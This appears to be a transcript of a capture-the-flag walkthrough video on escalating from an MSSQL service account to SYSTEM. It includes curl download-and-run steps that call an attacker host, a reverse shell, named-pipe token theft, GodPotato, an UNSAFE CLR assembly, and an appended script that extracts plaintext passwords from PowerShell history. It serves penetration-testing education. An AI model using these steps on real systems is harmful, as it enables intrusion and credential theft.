I'm pretty certain the OPENROWSET is not going to work here. Let's see. Root. Grab this. Yeah, we don't have permission because we're guest. So if we had Chisel still up, we could use psexec to get Administrator that way. But the cool part is we could use a really old trick and restore our privilege. So I want to go back. Let's go back to the gen ticket. Let me look at this. We're going to be MSSQL SVC. That is good. So we'll just do this, and then I want to use the Kerberos ticket to get a shell, and let's do xp_cmdshell. Do I have the encoded command up here? I don't; I got rid of that. www, echo -n, New-Object Net.WebClient. I bet NetExec has something to get me a shell I should just use, but oh well, already down this road. PS1. Let's just do this. iconv -t UTF-16LE | base64 -w 0. Oh, I missed the -t. There we go. I'm really shooting myself in the foot by closing all my windows earlier. Oh well. powershell -EncodedCommand, paste that. Got to make sure we're running the service. There we go. So if I do whoami /priv, we don't have any advanced privileges.

So let's see, if we go to a really old post... let's see, "Sharing a Logon Session a Little Too Much". Do this. There's this post, and essentially what it tells us is we can start a named pipe, and then when we create a job to have it connect to that named pipe, it's going to use the very first token that process had to connect to the pipe, and that is how you can steal that token. This is mainly big for network services, like when you get a shell from MSSQL, or maybe something similar, if your shell doesn't have SeImpersonate by default. So the key piece is, what is it? They have a library here that they don't really talk about in this post; maybe it's in the previous one. Yeah, NtObjectManager. This is a bit of a pain to get, but it's definitely something that is super good. I'm just going to search GitHub for NtObjectManager. It goes to a Project Zero...
And what you'll want to do is download this to a Windows machine or clone it. Open it in Visual Studio, then compile. It'll probably take me like five to ten minutes to do, so I'm not going to show that. But when you compile it, you're going to get a directory structure, probably release/bin, that is going to look like the zip I'm about to copy over. So let's do NtObjectManager. We'll copy this file over. And I forgot I wanted to show one other thing I had tried. It did not work, but I guess I'll show it at the end of the video. So this is going to be a zip. Let's go: cd ProgramData, curl http://10.10.14.8:8000/... start this up. We're going to download, and then I can do, what is it, Expand-Archive -DestinationPath. Is that it, the destination path? I don't even know if I need that. Yeah. So we've unzipped it. This is the script list that you're going to get if you just compile it and go into the bin directory. And we can Import-Module, and that's going to give us all the functions we need to pull off this attack. So we can do Import-Module, I hope.

The big downside here is the reverse shell I'm in doesn't have standard error. I wonder if I do 2>&1. Yeah, I don't know how to restore that. I'd probably have to fix the reverse shell script. So if anything fails, we won't know, which sucks. But yeah. So what I'm going to do is pretty much run through this post real quick. I'm going to create a new named pipe, and this could be anything; it's just going to be what it's called, ABC. And I want to say the Fighter video... I've done this? Fighter. Let's see. I know I've done named pipes before and it was a really long time ago. There we go. Probably Hackback is what you'd want to watch if you want to learn more about named pipes. But anyway, we create this named pipe, and then we're going to start a job which is just going to make this pipe listen in the background.
So if I do Get-Job, we can see... is it completed already? I don't know if it should be completed. I thought it'd be running, but oh well. Let's just get this NtFile. And now I don't think we need a Wait-Job; we should just be able to do this. It's going to be multi-line. Let's just say $token equals Use-NtObject, then Get-NtToken -Impersonation. There we go. $token. Yes, I have a token. So if we do $token.Privileges, we can see this token has SeImpersonate, which is awesome. So if I do whoami /priv right now, you can see this process does not have SeImpersonate, but if I do New-Win32Process -CommandLine "whoami /priv" redirected to C:\ProgramData, what is it, out.txt I guess, and then give it the token... Now we can do type C:\ProgramData\out.txt. That did not work. CommandLine, status, wait. Why did that not work? That definitely should have. C:\. Can we do double backslashes? Is it getting terminated? It's not giving me any output. That file may not even exist. Actually, something weird is going on. C:\ProgramData. Just going to do ZZ because that would go to the very bottom of this list. $token.Privileges. I don't know what is going on here. cmd /c. Let's put this in a single quote, double quote here. Okay. When I did it through... oh, I know what went on. This redirection is probably part of command prompt, so when I was just running the whoami binary, it did not understand this. That has to be what happened. Yep, there we go. So now we have the SeImpersonate privilege.

So what does that mean we can do? Well, let's go ahead and get a reverse shell as this. So we'll do powershell -enc. You can do it in a new shell. Run did not give me a shell. cmd /c. Maybe that wasn't the issue; maybe it has something to do with argument parsing. I don't know. That's still not working. -EncodedCommand. That definitely should work. This xp_cmdshell, powershell -EncodedCommand...
I think my encoded command is wrong. Did I not copy everything? Let's copy that whole thing and delete... Word. We're not getting any output from this. That does work, like the Win32... Oh, we need -Token. There we go. Still not getting our shell. Did I do a cmd.exe before? Okay, let's just see if we can do what we did before. I don't know what's going on with my PowerShell shell. whoami to C:\ProgramData, annoyed. That is pending. So that definitely works. whoami; I should have done a different command. hostname. So that definitely works. -EncodedCommand... I wonder if there's a number of characters we can send and that's screwing us up. I really didn't expect this piece to be the piece that takes forever. Do that. Close out the single quote. Oh, where are you? So it definitely errored. PowerShell doesn't like how we're passing the argument. -NoProfile. Okay, let's just see. curl http://10.10.14.8:8000/shell.ps1. Maybe this will work. powershell C:\ProgramData\shell.ps1. There we go. I don't know what the encoded command thing was doing, but now we have a shell. We have the SeImpersonate privilege here. That was a pain.

So now I'm just going to do GodPotato, because this lets me get a command really, really easily. Let's just go ahead and download this. The simple things you struggle with sometimes, but it's always handy to know ways out of it when you get stuck. Copy link. We will wget this, move GodPotato... I'm just going to put it in www as gp.exe. ProgramData. And if we try dir C:\Users\Administrator\Desktop, we still can't access this. Again, we don't have standard error, so we're not seeing anything here. curl http://10.10.14.8:8000/gp.exe. Run it, and all we have to do is gp.exe -cmd whoami, and we're NT AUTHORITY\SYSTEM. So let's go ahead and listen on 9001: gp.exe -cmd "powershell C:\ProgramData\shell.ps1". There we go. Users, Administrator, Desktop. And there we go, we can get root.txt this way.
So I like this way of getting from my SQL shell to privesc more than the intended way, because we stay within MSSQL the entire time, right? So it really fits the theme instead of just doing that old CVE. Well, it was new at the time when this box was released, but the Active Directory CVE; I like staying within Microsoft SQL the entire time. Now, when I was solving this box, or trying to find this, it took me a while to find this post. I actually talked to Cody, Control0, over at Hack The Box, and he's the one that pointed me this way. But before that I was trying to find a lot of different ways to run code, right? We knew xp_cmdshell just did not work, right? Well, it worked, but we couldn't be Administrator, right? So I was thinking, huh, is there another way we can execute code on Microsoft SQL where the parent process has the permission? Because obviously when we did that OPENROWSET with BULK, we were able to read root.txt from the Microsoft SQL shell. Let's see, root.txt. Do I still have that command here? Yeah. Right. So obviously we have administrative privileges somehow, but when we did xp_cmdshell that got dropped. So I remembered when solving, I want to say it was DarkCorp, we did a Microsoft SQL pivot and that launched a CLR process. It was another way to execute code. Let's see if I add this. Oh, am I not going to be able to find this now? Maybe "mssql proxy CLR". Yes, this one. So on a box a long time ago, we used MSSQL to launch a proxy. And if we follow this chain, it kind of talks about exactly how to do it. I think this NetSPI article is better that they referenced. So they load a CLR assembly, and I thought maybe, hey, maybe xp_cmdshell can't do it because when it does Process.Start right here, maybe this is what's dropping our privilege.
So I gave that script over to AI and I just said, hey, I want to replicate this but only read files, because in my mind if I only read a file then there's a higher likelihood my process privilege isn't being dropped, and also all this is doing is reading a file, right? Maybe I somehow have permission to read files but not run commands, so that's why I kept it limited to reading files. AI ended up giving me a... and I'll copy it here real quick. So I'll put it in www, and then I'll go in and view the file. So here it is. It's just a stored procedure: file path, we ReadAll, and then we send the content back. So that's very similar to this, but I just wanted to dumb it down to only read files. First I did this whole thing, and when I did my xp... or this was cmd_exec, which creates a command, but when I did this I was still the SQL service, right? So I thought, hey, let's try just dumbing it down, and that's what I just want to show real quick. It doesn't lead to anything, but I found this research pretty interesting, and also when solving these boxes I go down like 50 paths and you're only seeing the correct path, so I just want to show more of just going down random paths, right?

So let's see. Do I still have that xp_cmdshell here? I do. www, python3 -m http.server. One of these times I won't kill my shell, but that is not here. So we get... this was the command I was copying from wrong. I copied this from history. I feel like I'm taking crazy pills. echo -n. Sweet, it's in my history still. I think my terminal glitched and I've been having the wrong base64 the entire time, because that is a different base64. I think that was my problem earlier. I have no idea what just went on, but that's a story for another day. So let's see. Why am I getting this? Oh, because I want to be able to compile this. We could just do this on a Windows box that I have, but I don't have Windows running right now, so it's easier if I just go on this box and do it.
So what I'm doing here is getting the path to where csc exists. This should exist on any box that has .NET installed. And I'm just going to go to ProgramData, and then we can download read. So we'll do curl http://10.10.14.8:8000/read.cs and call it read.cs there. We should have that file. I'm just going to mkdir tmp real quick and we'll go in there, because all those files in ProgramData are confusing me. So there we go; we just have that file. We can call csc.exe /target:library and then C:\ProgramData\tmp\read.cs. And now we have read.dll. So let's go back, and let's see, we just import it. So I'm going to use this. My SQL shell is going slow; let's just restart it. There we go. Run that. Let's enable the CLR. And now we want to CREATE ASSEMBLY FROM C:\ProgramData\tmp\read.dll, which is where it is, and we need to do WITH PERMISSION_SET = UNSAFE. There we go. Let's see, copy this. And this is going to fail because I don't have cmd_exec in it. What did I call that function? It's probably read. Let's see, ReadFile. Okay, I should just call this. There we go. So this is creating the procedure ReadFile, and if I call this, I should be able to read files on the box. So let's do C:\Users, MSSQL SVC, Desktop\user.txt. Incorrect syntax. Do I do it in quotes? There we go. So see, I can read a file. So now my thought was, let's try getting the Administrator file. So Administrator\Desktop\root.txt, and we can't: permission is denied. So even as the CLR, it's still using that downgraded permission, and I don't know a way around that. The only way I found to fix all the permissions is using the trick I just showed: the named pipe, stealing the token, then abusing SeImpersonate to get back to Administrator. So that is going to be the box. Hope you enjoyed this whole garble of things. There's a lot of good Microsoft SQL pentesting stuff here, so it's probably a good box to study. Take care all, and I will see you all next
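When the transcript pulls ConsoleHost_history.txt through OPENROWSET, the SQL client prints the file as a bytes blob with literal \r\n in it, and the video falls back to sed to make it readable. The Python below is an added example for this page, not IppSec's script and not 0xdf's: it normalises the three shapes that output usually takes (a 0x... varbinary from SINGLE_BLOB, a b'...' Python repr as printed by mssqlclient, or text where the CRLFs survived only as the literal characters \r\n), splits the history into commands, and flags the lines that set a password, pulling the plaintext out of ConvertTo-SecureString '...' the way the video found the Administrator password. The sample history, hostnames and the password in it are constructed for the example.

```python
import ast
import re

# Constructed sample of what the history looked like when pasted out of the
# SQL client: a bytes repr with escaped CRLFs. The commands and password are
# made up for this example.
SAMPLE_HISTORY_REPR = (
    r"b'Install-WindowsFeature -Name RSAT-AD-PowerShell\r\n"
    r"Get-Service MSSQLSERVER\r\n"
    r"Get-NetIPAddress\r\n"
    r"Set-ADAccountPassword -Identity administrator -Reset "
    r"-NewPassword (ConvertTo-SecureString \'Winter2025!\' -AsPlainText -Force)\r\n"
    r"Restart-Service MSSQLSERVER\r\n'"
)

# Cmdlets and parameters that tend to carry secrets in a PSReadLine history.
INTERESTING = re.compile(
    r"Set-ADAccountPassword|New-ADUser|Set-LocalUser|New-LocalUser|net\s+user\b|"
    r"ConvertTo-SecureString|-Password\b|-Credential\b",
    re.IGNORECASE,
)
PLAINTEXT = re.compile(r"""ConvertTo-SecureString\s+(['"])(?P<secret>.*?)\1""", re.IGNORECASE)
IDENTITY = re.compile(r"-(?:Identity|Name)\s+(?P<who>[^\s)]+)", re.IGNORECASE)


def history_to_lines(raw: str) -> list[str]:
    """Turn the history as pasted from the SQL client into a list of commands."""
    text = raw.strip()
    if text.startswith("0x"):
        data = bytes.fromhex(text[2:])                      # SINGLE_BLOB varbinary
    elif text.startswith(("b'", 'b"')):
        data = ast.literal_eval(text)                       # Python bytes repr
    else:
        # Literal backslash-r backslash-n in the text: decode the escapes.
        data = text.encode("utf-8").decode("unicode_escape").encode("latin-1")
    decoded = data.decode("utf-8-sig", errors="replace")    # strips a BOM if present
    return [ln for ln in decoded.replace("\r\n", "\n").split("\n") if ln.strip()]


def find_credentials(lines: list[str]) -> list[dict]:
    """Return the history entries that look like they set or pass a password."""
    found = []
    for n, line in enumerate(lines, 1):
        if not INTERESTING.search(line):
            continue
        secret = PLAINTEXT.search(line)
        who = IDENTITY.search(line)
        found.append({
            "line": n,
            "command": line,
            "identity": who.group("who") if who else None,
            "secret": secret.group("secret") if secret else None,
        })
    return found


if __name__ == "__main__":
    for hit in find_credentials(history_to_lines(SAMPLE_HISTORY_REPR)):
        print(f"{hit['line']:>3}: {hit['identity']} -> {hit['secret']}")
        print(f"     {hit['command']}")
```

The same function also works on a 0x... blob, so you can feed it straight from SELECT * FROM OPENROWSET(BULK '...', SINGLE_BLOB) instead of round-tripping through sed.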
Original Description
00:00 - Introduction
01:00 - Start of nmap
02:05 - Logging into the SQL Database with the provided credentials, going over basic enumeration
04:00 - Using XP_DIRTREE to have the SQL Server make a request, sending it to ourself and stealing/cracking the hash
08:50 - Showing RID Brute Forcing with MSSQL to enumerate additional users
10:50 - Explaining how the SUSER_SID command performs a SID Bruteforce, converting the SID from binary to String notation
15:00 - Creating a Silver Ticket with Ticketer.py
23:30 - Impersonating an admin, so we can enable xp_cmdshell to get a shell on the box
27:20 - Showing CVE-2025-33073 posts, which explains the attack we will do with NTLM Relay and cred marshalling
28:30 - Getting Chisel up and running so we can add DNS Names
31:20 - Adding a special DNS Name so we can impersonate DC01, then starting NTLMRelay and forwarding connections to WinRM
37:00 - Using NetExec's coerce_plus to force a request to be made to our special DNS Name and getting a shell
42:30 - Showing if we impersonated the SQL Service itself we could abuse OpenRowSet to read files as administrator and just read root.txt from an SQL Shell
47:10 - Reading the powershell history which would get us the administrator password
54:10 - Showing yet another cool thing, we can abuse how tokens work to get the original token of our the service account which would allow us to have SEImpersonate,then we can use a potato to privesc
1:12:10 - Not every attempt is successful showing adding custom functions via CLR wouldn't give us administrative privileges